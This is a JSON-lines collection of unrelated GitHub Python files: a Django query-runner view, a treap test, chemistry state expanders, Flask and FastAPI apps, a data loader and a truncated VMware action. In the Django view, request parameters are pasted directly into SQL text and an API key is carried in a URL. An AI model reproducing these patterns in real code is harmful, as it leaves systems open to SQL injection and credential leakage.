result.last_view_timestamp = timezone.now()\n result.view_count = result.view_count + 1\n result.save()\n return result\n\n def get_context_data(self, **kwargs):\n context = super(ResultDetailView, self).get_context_data(**kwargs)\n values = Value.objects.filter(result=self.object)\n params = 
Parameter.objects.filter(query=self.object.query)\n\n has_valid_parameters = True\n for value in values:\n # if the value of this result does not match any of the current parameters of the query\n if not any(parameter.name == value.parameter_name for parameter in params):\n has_valid_parameters = False\n for param in params:\n # if a current parameter for the query doesn't match any of the saved values\n if not any(param.name == value.parameter_name for value in values):\n has_valid_parameters = False\n context['params'] = values\n # getting historic results\n context['results'] = users_recent_results(query=self.object.query, user=self.request.user)\n context['selected_result'] = self.object\n context['has_valid_parameters'] = has_valid_parameters\n # TODO constructing API URL\n api_params = f\"?api_key={self.request.user.profile.api_key}\"\n\n if has_valid_parameters:\n for value in values:\n api_params += f\"&{value.parameter_name}={value.value}\"\n else:\n for param in params:\n api_params += f\"&{param.name}=[{param.name} value]\"\n context['api_url'] = f\"http://{self.request.get_host()}/api/{self.object.query.id}/{api_params}\"\n return context\n\n\ndef execute(request, query_id):\n user = request.user\n if not user.is_authenticated:\n return redirect(reverse('login'))\n query = get_object_or_404(Query, pk=query_id)\n user_can_access_query(user, query)\n if settings.DEBUG:\n result = get_result(request, query)\n # record this is a success\n query.increment_success()\n return redirect(reverse('result-detail', args=[result.pk]))\n else:\n try:\n result = get_result(request, query)\n # record this is a success\n query.increment_success()\n return redirect(reverse('result-detail', args=[result.pk]))\n except Exception as err:\n # log the error\n query_error = QueryError(\n user=request.user,\n query=query,\n error=err\n )\n query_error.save()\n # record error with query version\n query.increment_failure()\n # report to user\n context = {\n 'query': query,\n 'error': err,\n }\n return render(request, 'queries/result_error.html', context)\n\n\ndef execute_api(request, query_id):\n api_key = request.GET.get('api_key')\n try:\n profile = Profile.objects.get(api_key=api_key)\n user = profile.user\n except Profile.DoesNotExist:\n user = None\n if user is None or not user.is_authenticated:\n return JsonResponse({'error': 'User not authenticated'})\n query = get_object_or_404(Query, pk=query_id)\n user_can_access_query(user, query)\n try:\n data = get_data(request, query, request_type=\"GET\")\n json = {'title': data.title}\n row_count = len(data.df.index)\n if row_count == 0:\n if len(data.df.columns.values) == 0:\n print(\"no results\")\n json.update({\"message\": \"Success. 
(no rows returned)\"})\n else:\n print(\"no data\")\n json.update({\"columns\": list(data.df.columns.values)})\n json.update({\"data\": []})\n else:\n print(\"data to dict\")\n table = data.df.to_dict(orient='split')\n del table['index']\n json.update(table)\n return JsonResponse(json)\n except Exception as err:\n # log the error\n query_error = QueryError(\n user=request.user,\n query=query,\n error=err\n )\n query_error.save()\n return JsonResponse({'error': str(err)})\n\n\nclass ResultData:\n def __init__(self, df, title, sql, param_values):\n self.df = df\n self.title = title\n self.sql = sql\n self.param_values = param_values\n\n\n# with the result data, creating charts and tables\ndef get_result(request, query, save_result=True):\n data = get_data(request, query)\n df = data.df\n result_title = data.title\n sql = data.sql\n param_values = data.param_values\n row_count = len(df.index)\n column_count = df.columns.size\n chart = get_chart(df, result_title)\n # if chart is None:\n\n if row_count == 1 and column_count == 1:\n single = df.iat[0, 0]\n elif row_count == 0:\n if len(df.columns.values) == 0:\n single = \"Success. (no rows returned)\"\n else:\n column_titles = str(list(df.columns.values))\n single = f\"columns: {column_titles}\"\n elif df.empty:\n single = empty_df_message\n else:\n single = None\n result = Result(\n user=request.user,\n query=query,\n title=result_title,\n dataframe=df.to_json(),\n table=get_table(df),\n single=single,\n image_encoding=image_encoding,\n chart=chart,\n last_view_timestamp=timezone.now(),\n version_number=query.get_version_number(),\n query_text=sql\n )\n if save_result:\n result.save()\n # update query with latest result\n query.run_count += 1\n query.last_run_date = timezone.now()\n query.last_viewed = timezone.now()\n query.latest_result = result\n query.save()\n # save parameter values\n for param_name, param_value in param_values.items():\n value = Value(\n parameter_name=param_name,\n value=param_value,\n result=result\n )\n value.save()\n return result\n\n\n# 1. Getting the user, query and parameters\n# 2. Creating a connection to the db\n# 3. Replacing placeholder parameters with their values\n# 4. Executing the query\ndef get_data(request, query, request_type=None):\n user = request.user\n user_can_access_query(user, query)\n params = Parameter.objects.filter(query=query)\n # creating context for params data\n sql = query.query\n result_title = query.title\n param_values = {}\n for param in params:\n if request_type == \"GET\":\n param_value = request.GET.get(param.name)\n else:\n param_value = request.POST.get(param.name)\n\n if param_value is None:\n param_value = param.default\n param_values[param.name] = param_value\n # if there are results, save the param value as default\n sql = sql.replace(f\"{{{param.name}}}\", param_value)\n # adding param values to the result title\n result_title = f\"{result_title};\\n {param.name}: {param_value}\"\n # formatting the text to avoid problems with the % character in queries\n sql = sqlalchemy.text(sql)\n db = query.database\n engine = db.get_engine_with_user(user=user)\n\n with engine.connect().execution_options(isolation_level=\"AUTOCOMMIT\") as connection:\n try:\n df = pandas.read_sql(sql, connection)\n if len(df.index) > max_table_rows:\n df = df.head(max_table_rows)\n # Error happens if no rows are returned (e.g. 
a drop or create statement)\n # original solution used https://stackoverflow.com/a/12060886/2595659 and first\n # made sure there were rows, but the solution did not always create a dataframe\n # with the correct data types (they were being interpreted as object).\n # Though I do not love this ResourceClosedError solution because\n # there may be other reasons the connection can be closed\n except ResourceClosedError:\n df = pandas.DataFrame()\n engine.dispose()\n return ResultData(\n df=df,\n title=result_title,\n sql=sql,\n param_values=param_values\n )\n\n\n# https://www.section.io/engineering-education/representing-data-in-django-using-matplotlib/\n# possible idea for returning only image from endpoint: https://groups.google.com/g/pydata/c/yxKcJI4Y7e8\ndef get_graph():\n buffer = BytesIO()\n plt.savefig(buffer, format=image_encoding)\n buffer.seek(0)\n image_data = buffer.getvalue()\n graph = base64.b64encode(image_data)\n graph = graph.decode('utf-8')\n buffer.close()\n return graph\n\n\ndef get_svg_graph():\n buffer = BytesIO()\n plt.savefig(buffer, format='svg')\n buffer.seek(0)\n image_data = str(buffer.getvalue())\n image_data = image_data.replace('\\\\n', '\\n')\n buffer.close()\n return image_data\n\n\ndef get_chart(df, title):\n plt.style.use('dark_background')\n header = df.head()\n columns = list(header.columns.values)\n row_count = len(df.index)\n col_count = len(columns)\n if row_count < 2 or col_count < 2:\n return None\n first_value = df[columns[0]].iat[0]\n second_value = df[columns[1]].iat[0]\n third_value = None\n if col_count >= 3:\n third_value = df[columns[2]].iat[0]\n is_bar_or_pie = len(columns) == 2 and row_count > 1 and is_numeric_dtype(df.iloc[:, 1])\n is_pivot = (len(columns) == 3\n and row_count > 1\n and first_value is not None\n and second_value is not None\n and third_value is not None\n and (isinstance(first_value, datetime.date) or isinstance(first_value, numbers.Number))\n and isinstance(second_value, str)\n and isinstance(third_value, numbers.Number))\n if not is_bar_or_pie and not is_pivot:\n return None\n # if first_value is number or date, assume this is a bar chart\n is_bar = (first_value is not None\n and isinstance(first_value, (datetime.date, numbers.Number)))\n\n if is_pivot:\n # https://stackoverflow.com/a/48799804/2595659\n df.groupby([columns[0], columns[1]])[columns[2]] \\\n .sum() \\\n .unstack(level=1) \\\n .plot.area()\n # .plot.bar(stacked=True)\n\n\n elif is_bar:\n df.plot(x=columns[0], y=columns[1], kind='bar', figsize=(7, 4), legend=False, title=title)\n plt.locator_params(axis='x', nbins=10) # reduce the number of ticks\n # Else, pie chart\n else:\n # converting first column to a string\n df[columns[0]] = df[columns[0]].astype(str)\n grouped = df.groupby([columns[0]]).sum().sort_values([columns[1]], ascending=False)\n\n # row count:\n row_count = len(grouped.index)\n max_rows = 49\n if row_count > max_rows:\n # splitting dataframe by row index\n df1 = grouped.iloc[:max_rows, :]\n # summing the remainder\n df2 = grouped.iloc[max_rows:, :].sum()\n # adding sum of remainder columns as final row\n df1.loc['Remaining Values', :] = df2.sum(axis=0)\n grouped = df1\n grouped.plot(y=columns[1], autopct='%1.1f%%', kind='pie', figsize=(7, 4), legend=False, title=title)\n plt.axis('off')\n plt.tight_layout()\n chart = get_graph()\n return chart\n\n\ndef get_table(df):\n css_classes = \"table table_dark table-sm table-responsive\"\n table_id = \"results\"\n row_count = len(df.index)\n if row_count == 0:\n columns = list(df.columns.values)\n 
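# no rows came back: build a header-only HTML table so the column names still render\n 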
table = f\"\"\n table += \"
{column}
\"\n return table\n else:\n return df.to_html(classes=[css_classes],\n table_id=table_id,\n index=False)\n","repo_name":"brianrisk/qwaver","sub_path":"queries/views/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":13293,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"17067384159","text":"#!/usr/bin/env python3\n\nfrom time import clock\nfrom random import random, seed, shuffle\nfrom jimn.tree.treap import Treap\n\nroot = Treap(2000, root_node=True)\nseconds = clock()\nprint(seconds)\nseed(seconds)\n\nprint(\"creation\")\nvalues = []\nfor _ in range(10):\n new_value = random()\n values.append(new_value)\n print(\"adding:\", new_value)\n root.add(new_value)\n root.tycat()\n\nprint(\"neighbours\")\nfor value in sorted(values):\n neighbours = [n.content for n in root.find(value).neighbours()]\n print(value, \"is neighboured by\", [str(v) for v in neighbours])\n\nprint(\"nodes greater than 0.5\")\nhalf = root.add(0.5)\nroot.tycat()\nfor node in half.greater_nodes():\n print(node.dot_label())\nvalues.append(0.5)\n\nprint(\"infix walk\")\nfor content in root.ordered_contents():\n print(content)\n\nprint(\"destruction\")\nshuffle(values)\nfor value in values:\n print(\"removing:\", value)\n node = root.find(value)\n node.remove()\n root.tycat()\n","repo_name":"wagnerf42/Jimn","sub_path":"src/interactive_tests/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10164440697","text":"import os\nimport subprocess\nimport tempfile\nfrom typing import Literal\n\nfrom asapdiscovery.data.openeye import (\n load_openeye_sdfs,\n oechem,\n oequacpac,\n save_openeye_sdfs,\n)\nfrom asapdiscovery.data.schema_v2.ligand import Ligand\nfrom asapdiscovery.data.state_expanders.state_expander import StateExpanderBase\nfrom pydantic import Field\n\n\nclass ProtomerExpander(StateExpanderBase):\n \"\"\"\n Expand a molecule to protomers using OpenEye reasonable protomer state enumeration.\n\n Note:\n The input molecule is included in the output.\n \"\"\"\n\n expander_type: Literal[\"ProtomerExpander\"] = \"ProtomerExpander\"\n\n def _provenance(self) -> dict[str, str]:\n return {\n \"oechem\": oechem.OEChemGetVersion(),\n \"quacpac\": oequacpac.OEQuacPacGetVersion(),\n }\n\n def _expand(self, ligands: list[Ligand]) -> list[Ligand]:\n expanded_states = []\n provenance = self.provenance()\n for parent_ligand in ligands:\n oemol = parent_ligand.to_oemol()\n for protomer in oequacpac.OEGetReasonableProtomers(oemol):\n fmol = oechem.OEMol(protomer)\n # copy the ligand properties over to the new molecule, we may want to have more fine grained control over this\n # down the track.\n protomer_ligand = Ligand.from_oemol(fmol, **parent_ligand.dict())\n if protomer_ligand.fixed_inchikey != parent_ligand.fixed_inchikey:\n # only add tags to new microstates of the input molecule\n protomer_ligand.set_expansion(\n parent=parent_ligand, provenance=provenance\n )\n expanded_states.append(protomer_ligand)\n else:\n expanded_states.append(parent_ligand)\n # add the parent if it is not present.\n if parent_ligand not in expanded_states:\n expanded_states.append(parent_ligand)\n\n return expanded_states\n\n\nclass EpikExpander(StateExpanderBase):\n \"\"\"\n Expand the protomer and tautomeric states of a molecule using epik and capture the state penalties.\n\n Note:\n The method assumes you have schrodinger software installed and 
the path to the software is exported as a\n environment variable named SCHRODINGER.\n \"\"\"\n\n expander_type: Literal[\"EpikExpander\"] = \"EpikExpander\"\n\n ph: float = Field(\n 7.3,\n description=\"The ph that should be used when calculating the state penalty.\",\n )\n\n def _create_cmd(self, *programs: str) -> str:\n \"\"\"\n Create a command which can be used to call some SCHRODINGER software\n Returns\n -------\n The string which can be passed to subprocess to call epik\n \"\"\"\n # create a path to epik\n schrodinger_folder = os.getenv(\"SCHRODINGER\")\n if schrodinger_folder is None:\n raise RuntimeError(\n \"Epik enumerator requires the path to the schrodinger software to be set as the \"\n \"SCHRODINGER environment variable.\"\n )\n epik = os.path.join(schrodinger_folder, *programs)\n return epik\n\n def _provenance(self) -> dict[str, str]:\n \"\"\"\n Run epik to get the version info.\n Returns\n -------\n The version of epik used.\n \"\"\"\n epik_cmd = self._create_cmd(\"epik\")\n # call epik to get the version info\n output = subprocess.check_output([epik_cmd, \"-v\"])\n for line in output.decode(\"utf-8\").split(\"\\n\"):\n if \"Epik version\" in line:\n version = line.split()[-1]\n break\n else:\n version = \"unknown\"\n\n return {\n \"epik\": version,\n }\n\n def _prepare_ligands(self, ligands: list[Ligand]):\n \"\"\"\n Convert the list of Ligands to a SCHRODINGER mae file before running with Epik.\n \"\"\"\n oe_ligands = [ligand.to_oemol() for ligand in ligands]\n save_openeye_sdfs(oe_ligands, \"input.sdf\")\n convert_cmd = self._create_cmd(\"utilities\", \"structconvert\")\n with open(\"structconvert.log\", \"w\") as log:\n subprocess.run(\n convert_cmd + \" input.sdf input.mae\",\n shell=True,\n stdout=log,\n stderr=log,\n check=True,\n )\n\n def _extract_ligands(self) -> list[Ligand]:\n \"\"\"\n Extract the state expanded ligands from the Epik output file.\n Returns\n -------\n A list of expanded state ligands.\n \"\"\"\n convert_cmd = self._create_cmd(\"utilities\", \"structconvert\")\n with open(\"structconvert.log\", \"w\") as log:\n subprocess.run(\n convert_cmd + \" output.mae output.sdf\",\n shell=True,\n stdout=log,\n stderr=log,\n check=True,\n )\n oe_mols = load_openeye_sdfs(sdf_fn=\"output.sdf\")\n # parse into ligand objects\n expanded_ligands = [Ligand.from_oemol(oemol) for oemol in oe_mols]\n return expanded_ligands\n\n def _call_epik(self):\n \"\"\"Call Epik on the local ligands file.\"\"\"\n import numpy as np\n\n epik_command = self._create_cmd(\"epik\")\n min_population = np.exp(-6)\n epik_command += f\" -WAIT -ms 16 -ph {self.ph} -p {min_population} -imae input.mae -omae output.mae\"\n with open(\"epik_log.log\", \"w\") as log:\n subprocess.run(epik_command, shell=True, stdout=log, stderr=log, check=True)\n\n def _expand(self, ligands: list[Ligand]) -> list[Ligand]:\n \"\"\"\n Expand the protomers and tautomers of the input molecules using Epik and calculate the state penalty.\n\n Note:\n All input molecules are scored by Epik and have the values stored in Ligand.tags. Only new molecules will\n have an expansion tag however. 
For example ethane would receive a score but no expansion tag.\n\n Parameters\n ----------\n ligands: The list of ligands whose states should be expanded.\n\n Returns\n -------\n A list of expanded ligand states.\n \"\"\"\n # store where we are as we run epik in a tempdir\n home = os.getcwd()\n # calculate it once as it's expensive to call epik every time\n provenance = self.provenance()\n\n # as Epik runs on all molecules we need to keep track of the parent by tagging it\n parents_by_inchikey = {}\n for lig in ligands:\n # store the parent inchi key as a tag which will be included in the sdf file\n fixed_inchikey = lig.fixed_inchikey\n lig.set_SD_data({\"parent\": fixed_inchikey})\n parents_by_inchikey[fixed_inchikey] = lig\n\n with tempfile.TemporaryDirectory() as tempdir:\n os.chdir(tempdir)\n\n # create the mae file\n self._prepare_ligands(ligands=ligands)\n\n # call epik\n self._call_epik()\n\n # convert the ligands to sdf, epik tags are automatically picked up and stored\n expanded_ligands = self._extract_ligands()\n\n # move back to the home dir\n os.chdir(home)\n\n # set the expansion tag only for new microstate ligands\n for ligand in expanded_ligands:\n # do not set the expansion tag if the molecule is the same as the parent and has a score of 0\n state_penalty = float(ligand.tags[\"r_epik_State_Penalty\"])\n if ligand.tags[\"parent\"] == ligand.fixed_inchikey and state_penalty == 0:\n continue\n\n parent = parents_by_inchikey[ligand.tags[\"parent\"]]\n ligand.set_expansion(parent=parent, provenance=provenance)\n\n return expanded_ligands\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/state_expanders/protomer_expander.py","file_name":"protomer_expander.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"27063322046","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.cache import Cache\nfrom HTMLParser import HTMLParser\nfrom re import sub\nfrom sys import stderr\nfrom traceback import print_exc\n\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\ncache = Cache(app)\n\n\nfrom apps.about.views import about\napp.register_blueprint(about,url_prefix='/about')\nfrom apps.admin.views import admin\napp.register_blueprint(admin,url_prefix='/admin')\nfrom apps.category.views import category\napp.register_blueprint(category,url_prefix='/category')\nfrom apps.tag.views import tag\napp.register_blueprint(tag,url_prefix='/tag')\nfrom apps.search.views import search\napp.register_blueprint(search,url_prefix='/search')\nfrom apps.article.views import article\napp.register_blueprint(article,url_prefix='/article')\nfrom apps.index.views import index\napp.register_blueprint(index,url_prefix='/')\n\nclass _DeHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.__text = []\n\n def handle_data(self, data):\n text = data.strip()\n if len(text) > 0:\n text = sub('[ \\t\\r\\n]+', ' ', text)\n self.__text.append(text + ' ')\n\n def handle_starttag(self, tag, attrs):\n if tag == 'p':\n self.__text.append('\\n\\n')\n elif tag == 'br':\n self.__text.append('\\n')\n\n def handle_startendtag(self, tag, attrs):\n if tag == 'br':\n self.__text.append('\\n\\n')\n\n def text(self):\n return ''.join(self.__text).strip()\n\n\ndef dehtml(text):\n try:\n parser = _DeHTMLParser()\n parser.feed(text)\n parser.close()\n return 
parser.text()\n except Exception:\n print_exc(file=stderr)\n return text\n\n\ndef html2textile(html):\n return dehtml(html)\n\napp.jinja_env.filters['html2textile'] = html2textile\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/404')\ndef error_404():\n return render_template('404.html'), 404\n\n\n@app.route('/error')\ndef error_temp(content='404'):\n return render_template('error.html', content=content)\n","repo_name":"sixu05202004/flaskblog","sub_path":"flaskblog-blueprints/flaskblog/apps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"53"} +{"seq_id":"20253673063","text":"import torch\nfrom torch.utils.data import Dataset\n\nclass SentimentAnalysisDataset(Dataset):\n def __init__(self, tokenized_instances, labels, vocabulary_list, \n transform=None, target_transform=None):\n vocab_indexes = {}\n\n for i, w in zip(range(len(vocabulary_list)), vocabulary_list):\n vocab_indexes[w] = i\n\n self.transform = transform\n self.target_transform = target_transform\n\n # We will do something like extracting n-grams and converting them to tensors\n self.data = []\n self.labels = labels\n\n for instance in tokenized_instances:\n curr_processed_instance = []\n\n for token in instance:\n curr_processed_instance.append(vocab_indexes[token])\n \n self.data.append(curr_processed_instance)\n \n return\n\n\n\n def __len__(self):\n return len(self.data)\n\n\n\n def __getitem__(self, idx):\n instance = self.data[idx]\n label = self.labels[idx] if self.labels is not None else None\n\n if self.transform:\n instance = self.transform(instance)\n\n if self.labels is not None and self.target_transform:\n label = self.target_transform(label)\n\n return instance, label","repo_name":"ManosL/IMDb-Reviews-Sentiment-Analysis","sub_path":"code/sentiment_analysis_dataset.py","file_name":"sentiment_analysis_dataset.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31903003156","text":"\"\"\"Movie endpoints.\"\"\"\n\nimport http\nfrom typing import List\n\nimport fastapi\nimport pydantic\nfrom fastapi import status\nfrom sqlmodel.ext.asyncio import session as aio_session\n\nfrom app.api import dependencies\nfrom app.crud import movie as movie_crud\nfrom app.models import movie as movie_model\nfrom app.models import patron as patron_model\nfrom app.models import response\n\nrouter = fastapi.APIRouter()\n\n\n@router.post(\"/\",\n response_model=movie_model.MovieRead,\n status_code=201,\n responses={\n 401: {\n \"model\": response.Response\n },\n 409: {\n \"model\": response.Response\n }\n })\nasync def create_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_in: movie_model.MovieCreate,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n) -> movie_model.Movie:\n \"\"\"Creates a new movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.get_by_title(session,\n movie_in.title_en)\n\n if movie_db:\n raise fastapi.HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"A movie with this title already exists in the system.\",\n )\n if current_patron.id != movie_in.proposed_by:\n raise fastapi.HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"https://www.youtube.com/watch?v=Z4oDZCJMDeY\")\n\n movie 
= await movie_crud.MovieCRUD.create(session, model_in=movie_in)\n\n return movie\n\n\n@router.get(\"/{movie_id}\",\n response_model=movie_model.MovieReadWithPatron,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def read_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_id: pydantic.UUID4,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n) -> movie_model.Movie:\n \"\"\"Returns a movie given the id.\"\"\"\n movie = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n\n return movie\n\n\n@router.get(\"/\",\n response_model=List[movie_model.MovieRead],\n responses={401: {\n \"model\": response.Response\n }})\nasync def read_movie_list(\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n offset: int = 0,\n limit: int = fastapi.Query(default=100, le=100),\n) -> List[movie_model.Movie]:\n \"\"\"Returns a list of movies.\"\"\"\n return await movie_crud.MovieCRUD.read_multi(session,\n offset=offset,\n limit=limit)\n\n\n@router.put(\"/\",\n response_model=movie_model.MovieRead,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def update_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_patron),\n movie_id: pydantic.UUID4,\n movie_in: movie_model.MovieUpdate,\n) -> movie_model.Movie:\n \"\"\"Updates a movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie_db:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n if current_patron.id != movie_db.proposed_by:\n raise fastapi.HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"https://www.youtube.com/watch?v=Z4oDZCJMDeY\")\n\n movie_db = await movie_crud.MovieCRUD.update(session,\n model_db=movie_db,\n model_in=movie_in)\n\n return movie_db\n\n\n@router.delete(\"/\",\n status_code=204,\n responses={\n 401: {\n \"model\": response.Response\n },\n 404: {\n \"model\": response.Response\n }\n })\nasync def delete_movie(\n *,\n session: aio_session.AsyncSession = fastapi.Depends(\n dependencies.get_session),\n movie_id: pydantic.UUID4,\n current_patron: patron_model.Patron = fastapi.Depends( # pylint: disable=unused-argument\n dependencies.get_current_active_superuser),\n):\n \"\"\"Deletes a movie.\"\"\"\n movie_db = await movie_crud.MovieCRUD.read(session, movie_id)\n\n if not movie_db:\n raise fastapi.HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Movie not found.\")\n\n await movie_crud.MovieCRUD.delete(session, movie_id)\n\n return fastapi.Response(status_code=http.HTTPStatus.NO_CONTENT.value)\n","repo_name":"lamu-ai/beatrice","sub_path":"beatrice/backend/app/api/v1/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74278231527","text":"import os\nimport sys\ntry:\n from reponse_utils 
import *\nexcept Exception as e:\n # Add the parent directory to the path.\n currentdir = os.getcwd()\n parentdir = os.path.dirname(currentdir)\n sys.path.insert(0, parentdir)\n from reponse_utils import *\n\n\ndef nombre_mystere():\n \"\"\"\n Function that returns the mystery number of the riddle\n\n @arg : None\n @return : int -> the mystery number\n \"\"\"\n for nb_possible in range(123456789, 987654322):\n if \"0\" in str(nb_possible) or not str(nb_possible)[4] == '5' or not len(set(str(nb_possible))) == 9:\n continue\n counter = 0\n for i in range(0, 9):\n nb_test = int(nb_possible / 10**i)\n if not nb_test % (9 - i):\n counter += 1\n else:\n break\n if counter == 9:\n return nb_possible\n\n\ndef reponse_enigme2(nb_propose):\n try:\n nb_propose = int(nb_propose)\n except Exception as e:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Assurez vous de fournir un nombre entier (ou une chaine de caractère numérique)\"}\n if nb_propose == 381654729:\n return {\"reponse\": nb_propose, \"status\": \"succés\", \"msg\": \"Bravo, le nombre proposé est le bon\"}\n if not len(str(nb_propose)) == 9:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Le nombre proposé ne contient pas le bon nombre de chiffres\"}\n if \"0\" in str(nb_propose):\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": f\"Le nombre ne doit pas contenir de 0\"}\n if not len(set(str(nb_propose))) == 9:\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": \"Le nombre proposé contient plusieur fois le même chiffre\"}\n for i in range(0, 9):\n nb_test = int(nb_propose / 10**i)\n if nb_test % (9 - i):\n return {\"reponse\": nb_propose, \"status\": \"echec\", \"msg\": f\"Le nombre composé des {9 - i} premiers chiffres du nombre {nb_propose} n'est pas divisible par {9 - i}\"}\n\n\n# @pep8\n@timer\ndef code_enigme2(fonction):\n return fonction\n\n\nif __name__ == '__main__':\n print(code_enigme2(nombre_mystere()))\n","repo_name":"xtinoux/fifo_and_lifo","sub_path":"app/enigme2/enigme2.py","file_name":"enigme2.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71175497128","text":"import pypianoroll\nimport matplotlib.pyplot as plt\nPATH = \"\"\nmultitrack = pypianoroll.read(PATH)\nmultitrack.binarize()\ntrack = multitrack\n#track = multitrack.tracks[2]\ntrack.trim(0, 200 * multitrack.resolution)\ntrack.binarize()\ntrack.plot(grid_axis = 'off',xtick='off',xticklabel=False)\nplt.show()\n","repo_name":"FreddieHorn/generating-music-belonging-to-a-given-genre","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1308753532","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport pandas as pd\nfrom datetime import date\nimport pymysql\npymysql.install_as_MySQLdb()\nimport time\nimport sys\nimport os\n\nfrom os import path\nsys.path.append(path.dirname( path.dirname( path.abspath(__file__) ) ))\nfrom models.movie import Movie\nfrom config import SQLALCHEMY_DATABASE_URI\n\ns = time.time()\n\ndir = './data/movie/'\nfiles = [i for i in os.listdir(dir) if i.endswith('last_of_last.csv')]\nprint(\"작업파일:\\t\",files)\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\nprint(\"연결 성공\")\n\n\n# drop and 
생성\nMovie.__table__.drop(bind=engine)\nMovie.__table__.create(bind=engine)\n\ndef convert_release_date(release_date):\n '''\n '2021 .09.09 재개봉, 2020 .05.21 재개봉, 2019 .10.30 개봉'으로 써진 개봉일의\n 개행문자, 한글, 특수문자를 지우고 년, 월, 일로 나눈 뒤에\n date format으로 변환시켜줌\n '''\n release_date = release_date.split(',')[-1]\n release_date = release_date.replace(\" \",'').replace('개봉','').split('.')\n \n if len(release_date) == 1: # 개봉년, 월만 있는 경우\n year = int(release_date[0])\n month = 1\n day = 1\n\n elif len(release_date) == 2: # 개봉년, 월만 있는 경우\n year, month = map(int,release_date)\n day = 1\n\n else:\n year, month, day = map(int,release_date)\n \n release_date = date(year, month, day).isoformat()\n return release_date\n\ndef convert_running_time(running_time):\n '''\n xxx분 으로 써진 상영시간의 분을 떼고 INT로 변환\n '''\n return int(running_time[:-1])\n\n\nfor file_path in files:\n print(file_path)\n data = pd.read_csv(path.join(dir,file_path), encoding='utf-8')\n\n data['release_date'] = data['release_date'].apply(convert_release_date)\n data['running_time'] = data['running_time'].apply(convert_running_time)\n\n for i in range(len(data)):\n title = data.loc[i,\"title\"]\n release_date = data.loc[i,\"release_date\"]\n actor = data.loc[i,\"actor\"]\n director = data.loc[i,\"director\"]\n summary = data.loc[i,\"summary\"]\n running_time = data.loc[i,\"running_time\"]\n genre = data.loc[i,\"genre\"]\n rating = data.loc[i,\"grade\"]\n poster = data.loc[i,\"poster\"]\n nation = data.loc[i,\"nation\"]\n \n movie = Movie(\n title = title,\n release_date = release_date,\n actor = actor,\n director = director,\n summary = summary,\n running_time = running_time,\n poster = poster,\n genre = genre,\n rating = rating,\n nation = nation,\n )\n session.add(movie)\nsession.commit()\nsession.close()\ne = time.time()\nprint(f'작업 완료:\\t{e-s:.2f}초')\n","repo_name":"pepper29/Food-Recommendation-Project","sub_path":"참고자료/해시태그를 이용한 영화검색챗봇/server/flask/utils/add_movie.py","file_name":"add_movie.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18649365195","text":"from vmwarelib import inventory\nfrom vmwarelib.actions import BaseAction\n\n\nclass VMDestroy(BaseAction):\n\n def run(self, vm_id):\n # convert ids to stubs\n vm 